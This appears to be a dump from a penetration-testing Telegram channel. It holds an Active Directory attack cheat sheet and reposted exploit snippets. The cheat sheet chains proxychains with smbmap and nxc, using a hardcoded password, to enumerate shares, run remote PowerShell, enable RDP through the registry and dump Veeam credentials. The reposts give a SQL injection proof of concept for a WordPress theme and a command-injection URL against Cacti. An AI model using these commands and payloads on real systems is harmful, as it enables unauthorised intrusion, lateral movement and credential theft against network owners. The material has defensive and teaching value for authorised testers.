proxychains -q -f proxychains.conf smbmap -H 192.168.0.0 -u student -p 'Lvvvv34' -d 'knightpentest.local' -r 'D$'
proxychains -q -f proxychains.conf nxc smb 192.168.0.0 -u 'student' -p 'Lvvvv34' --shares
proxychains -q -f proxychains.conf nxc smb smbs.txt -u 'student' -p 'Lvvvv34' -M spider
Get process
proxychains -q -f proxychains.conf nxc smb 127.0.0.1 -u 'student' -p 'Lvvvv34' -x 'powershell /c "Get-WmiObject win32_process | Format-List ProcessId, CommandLine"'
rdp connect
proxychains -q -f proxychains4.conf xfreerdp /u:student /p:'Lvvvv34' /d:knightpentest.local /v:127.0.0.1 /cert-ignore
rdp on
proxychains -q -f proxychains.conf nxc smb 127.0.0.1 -u 'student' -p 'Lvvvv34' -d 'knightpentest.local' -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
Get-PSDrive
proxychains -q -f proxychains.conf nxc smb 192.168.0.0 -u 'student' -p 'Lvvvv34' -d 'knightpentest.local' -x 'powershell get-psdrive'
current user sessions
proxychains -q -f proxychains.conf nxc smb 192.168.0.0 -u 'student' -p 'Lvvvv34' -d 'knightpentest.local' -x 'quser'
Dump Veeam
proxychains -q -f proxychains.conf nxc smb 192.168.0.0 -u 'student' -p 'Lvvvv34' -M veeam
Viewing shared resources
net view \\KNIGHT\
πŸŒˆβ€”KnightPentestβ€”πŸŒˆ #activedirectory #pentest #windows

Repost from Proxy Bar
CVE-2024-33551 Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ SQL inj, обнаруТСнная Π² 8theme XStore, ΠΏΠ»Π°Ρ‚Ρ„ΠΎΡ€ΠΌΠ΅ элСктронной ΠΊΠΎΠΌΠΌΠ΅Ρ€Ρ†ΠΈΠΈ, созданной Π½Π° Π±Π°Π·Π΅ WordPress. Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ позволяСт ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ SQL Π² Π±Π°Π·Π΅ Π΄Π°Π½Π½Ρ‹Ρ…. * POC POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: keep-alive Upgrade-Insecure-Requests: 1 #wordpress #sql

Repost from Proxy Bar
CVE-2024-29895 cacti * Command injection in cmd_realtime.php * fofa link * usage: http://localhost/cacti/cmd_realtime.php?1+1
CVE-2024-29895 cacti * Command injection in cmd_realtime.php * fofa link * usage: http://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1 #net